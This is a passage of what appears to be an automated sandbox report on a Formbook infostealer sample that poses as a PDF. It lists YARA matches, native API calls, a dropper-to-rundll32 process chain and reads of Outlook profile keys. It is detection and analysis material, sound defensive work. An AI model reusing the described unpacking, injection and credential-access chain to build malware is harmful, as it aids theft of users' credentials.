          Source: Yara matchFile source: 0000000E.00000002.775075020.0000000000540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.306629173.0000000000470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.306509609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 3.2.gkvlc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.gkvlc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.gkvlc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.gkvlc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.775882995.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000E.00000002.775882995.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.775538057.0000000000980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000E.00000002.775538057.0000000000980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.307010756.00000000005E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.307010756.00000000005E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.775075020.0000000000540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000E.00000002.775075020.0000000000540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.306629173.0000000000470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.306629173.0000000000470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.306509609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.306509609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: TTCopy-240323-PDF.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 3.2.gkvlc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.gkvlc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.gkvlc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.gkvlc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.775882995.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000E.00000002.775882995.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.775538057.0000000000980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000E.00000002.775538057.0000000000980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.307010756.00000000005E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.307010756.00000000005E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.775075020.0000000000540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000E.00000002.775075020.0000000000540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.306629173.0000000000470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.306629173.0000000000470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.306509609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.306509609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: C:\Users\user\Desktop\TTCopy-240323-PDF.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
          Source: C:\Users\user\Desktop\TTCopy-240323-PDF.exeCode function: 0_2_00406D5F0_2_00406D5F
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 1_2_0040E6BD1_2_0040E6BD
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_004014473_2_00401447
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_004018403_2_00401840
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_0040C05E3_2_0040C05E
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_0040C0633_2_0040C063
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_004018373_2_00401837
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_004058A33_2_004058A3
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_004229563_2_00422956
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_004221573_2_00422157
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_004039193_2_00403919
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_004039233_2_00403923
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00422AD03_2_00422AD0
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00401C003_2_00401C00
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_0042262B3_2_0042262B
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_004056833_2_00405683
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_004226BC3_2_004226BC
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_004207333_2_00420733
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00421FE73_2_00421FE7
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_004217FA3_2_004217FA
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA20A03_2_00AA20A0
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B420A83_2_00B420A8
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A8B0903_2_00A8B090
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B428EC3_2_00B428EC
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B310023_2_00B31002
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A941203_2_00A94120
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A7F9003_2_00A7F900
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B422AE3_2_00B422AE
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AAEBB03_2_00AAEBB0
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B3DBD23_2_00B3DBD2
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B42B283_2_00B42B28
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A8841F3_2_00A8841F
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA25813_2_00AA2581
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A8D5E03_2_00A8D5E0
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B425DD3_2_00B425DD
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A70D203_2_00A70D20
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B42D073_2_00B42D07
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B41D553_2_00B41D55
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B42EF73_2_00B42EF7
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A96E303_2_00A96E30
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B41FF13_2_00B41FF1
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: String function: 00A7B150 appears 35 times
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: String function: 00401A50 appears 38 times
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_0041E813 NtAllocateVirtualMemory,3_2_0041E813
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_0041E633 NtCreateFile,3_2_0041E633
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_0041E6E3 NtReadFile,3_2_0041E6E3
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_0041E763 NtClose,3_2_0041E763
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_0041E6DD NtReadFile,3_2_0041E6DD
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AB98F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_00AB98F0
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AB9860 NtQuerySystemInformation,LdrInitializeThunk,3_2_00AB9860
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AB9840 NtDelayExecution,LdrInitializeThunk,3_2_00AB9840
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AB99A0 NtCreateSection,LdrInitializeThunk,3_2_00AB99A0
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AB9910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_00AB9910
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AB9A20 NtResumeThread,LdrInitializeThunk,3_2_00AB9A20
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AB9A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_00AB9A00
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AB9A50 NtCreateFile,LdrInitializeThunk,3_2_00AB9A50
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AB95D0 NtClose,LdrInitializeThunk,3_2_00AB95D0
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AB9540 NtReadFile,LdrInitializeThunk,3_2_00AB9540
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AB96E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_00AB96E0
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AB9660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_00AB9660
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AB97A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_00AB97A0
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AB9780 NtMapViewOfSection,LdrInitializeThunk,3_2_00AB9780
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AB9FE0 NtCreateMutant,LdrInitializeThunk,3_2_00AB9FE0
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AB9710 NtQueryInformationToken,LdrInitializeThunk,3_2_00AB9710
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AB98A0 NtWriteVirtualMemory,3_2_00AB98A0
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AB9820 NtEnumerateKey,3_2_00AB9820
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00ABB040 NtSuspendThread,3_2_00ABB040
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AB99D0 NtCreateProcessEx,3_2_00AB99D0
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AB9950 NtQueueApcThread,3_2_00AB9950
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AB9A80 NtOpenDirectoryObject,3_2_00AB9A80
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AB9A10 NtQuerySection,3_2_00AB9A10
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00ABA3B0 NtGetContextThread,3_2_00ABA3B0
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AB9B00 NtSetValueKey,3_2_00AB9B00
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AB95F0 NtQueryInformationFile,3_2_00AB95F0
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AB9520 NtWaitForSingleObject,3_2_00AB9520
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00ABAD30 NtSetContextThread,3_2_00ABAD30
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AB9560 NtWriteFile,3_2_00AB9560
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AB96D0 NtCreateKey,3_2_00AB96D0
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AB9610 NtEnumerateValueKey,3_2_00AB9610
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AB9670 NtQueryInformationProcess,3_2_00AB9670
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AB9650 NtQueryValueKey,3_2_00AB9650
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AB9730 NtQueryVirtualMemory,3_2_00AB9730
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00ABA710 NtOpenProcessToken,3_2_00ABA710
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AB9760 NtOpenProcess,3_2_00AB9760
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AB9770 NtSetInformationFile,3_2_00AB9770
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00ABA770 NtOpenThread,3_2_00ABA770
          Source: TTCopy-240323-PDF.exeReversingLabs: Detection: 70%
          Source: C:\Users\user\Desktop\TTCopy-240323-PDF.exeFile read: C:\Users\user\Desktop\TTCopy-240323-PDF.exeJump to behavior
          Source: TTCopy-240323-PDF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\TTCopy-240323-PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\TTCopy-240323-PDF.exe C:\Users\user\Desktop\TTCopy-240323-PDF.exe
          Source: C:\Users\user\Desktop\TTCopy-240323-PDF.exeProcess created: C:\Users\user\AppData\Local\Temp\gkvlc.exe "C:\Users\user\AppData\Local\Temp\gkvlc.exe" C:\Users\user\AppData\Local\Temp\htujbhttw.eyi
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeProcess created: C:\Users\user\AppData\Local\Temp\gkvlc.exe C:\Users\user\AppData\Local\Temp\gkvlc.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Users\user\Desktop\TTCopy-240323-PDF.exeProcess created: C:\Users\user\AppData\Local\Temp\gkvlc.exe "C:\Users\user\AppData\Local\Temp\gkvlc.exe" C:\Users\user\AppData\Local\Temp\htujbhttw.eyiJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeProcess created: C:\Users\user\AppData\Local\Temp\gkvlc.exe C:\Users\user\AppData\Local\Temp\gkvlc.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exeJump to behavior
          Source: C:\Users\user\Desktop\TTCopy-240323-PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\TTCopy-240323-PDF.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ERC\statecache.lockJump to behavior
          Source: C:\Users\user\Desktop\TTCopy-240323-PDF.exeFile created: C:\Users\user\AppData\Local\Temp\nsn334D.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/5@16/17
          Source: C:\Users\user\Desktop\TTCopy-240323-PDF.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
          Source: C:\Users\user\Desktop\TTCopy-240323-PDF.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\TTCopy-240323-PDF.exeCode function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404AB5
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5264:120:WilError_01
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCommand line argument: >@1_2_0040EC90
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: TTCopy-240323-PDF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: wntdll.pdbUGP source: gkvlc.exe, 00000001.00000003.259319301.000000001A320000.00000004.00001000.00020000.00000000.sdmp, gkvlc.exe, 00000001.00000003.256867850.000000001A190000.00000004.00001000.00020000.00000000.sdmp, gkvlc.exe, 00000003.00000003.262507721.0000000000709000.00000004.00000020.00020000.00000000.sdmp, gkvlc.exe, 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, gkvlc.exe, 00000003.00000002.307286924.0000000000B6F000.00000040.00001000.00020000.00000000.sdmp, gkvlc.exe, 00000003.00000003.264860524.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000003.306596206.000000000449C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.777446880.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.777446880.00000000048EF000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000003.308845671.0000000004633000.00000004.00000020.00020000.00000000.sdmp
